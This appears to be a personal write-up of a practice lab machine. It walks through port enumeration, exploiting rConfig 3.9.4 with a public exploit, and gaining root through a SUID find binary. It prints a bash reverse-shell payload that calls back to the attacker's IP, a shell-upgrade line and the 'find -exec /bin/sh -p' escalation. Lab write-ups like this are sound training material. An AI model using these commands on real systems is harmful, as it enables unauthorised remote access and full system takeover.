Quackerjack - Writeup - Konstantinovitz

## Enumeration - ftp - 21 - anon login permitted - trolls w. passive mode - very likely a rabbit hole - ssh - 22 - 1111 - rpcbind - ?? ### samba/smb - 445 - null sessions? - permitted - shares: - `print

- `IPC

Samba `v.4.10.4` ### webserver - `80` Seems to be a mere static page. Running [[FFUF]] to discover directories... ``` ╭─[λ]-[/targets/quackerjack]-[192.168.188.57] ╰─> ffuf -u http://$RHOST/FUZZ -c -w /arsenal/wordlists/raft-medium-words.txt -mc 200,301,302 ``` ### `rConfig` - 8081 - Parked Configuration management WAPP. https://github.com/rconfig/rconfig/blob/main/README.md Installed version is `3.9.4`: ![[Pasted image 20250331140607.png]] Current upstream version: `v6.0` Docs for `v6.0` states default credentials are: >Username: [[email protected]](mailto:[email protected]) Password: admin Attempting with `admin@quackerjack:admin` gives no love. Let's have a quick search for known vulns: ![[Pasted image 20250331141138.png]] Plenty to pick from here. Lowest hanging fruit would be this line: ``` rConfig 3.9.5 - Remote Code Execution (Unauthenticated) | php/webapps/48878.py ``` Note that this may specifically be for `v3.9.5` and thus not work for `v.3.9.4`. There's also this: https://www.exploit-db.com/exploits/48241 which is specifically for `v.3.9.4` That works out: ``` Method>2 (+) The admin user is present in this rConfig instance (+) The new password for the admin user is Testing1@ Choose method for RCE: 1) Unsafe call to exec() 2) Template edit ``` Couldn't get shell working... took a walk and bought a new hoodie. Came back, reset the box and changed the payload on line `23`: ```sh payload = "/bin/bash -i >& /dev/tcp/192.168.45.231/445 0>&1" ``` Go shell. ``` python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm ``` Took like an hour + break time. ## Privesc Ideas: internal ports Potentially SUID `/usr/bin/find` ``` ╔══════════╣ SUID - Check easy privesc, exploits and write perms ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid strace Not Found ... -rwsr-xr-x. 1 root root 195K Oct 30 2018 /usr/bin/find ... ``` 95% privesc vector (gold highlight in linpeas output). ``` find . -exec /bin/sh -p \; -quit ``` Aaaaaaand we get `root` in about 10 minutes: ## Lessons Learned - Got more reps in. - More SUID binary exploitaiton. - Taking a break is gold for getting unstuck.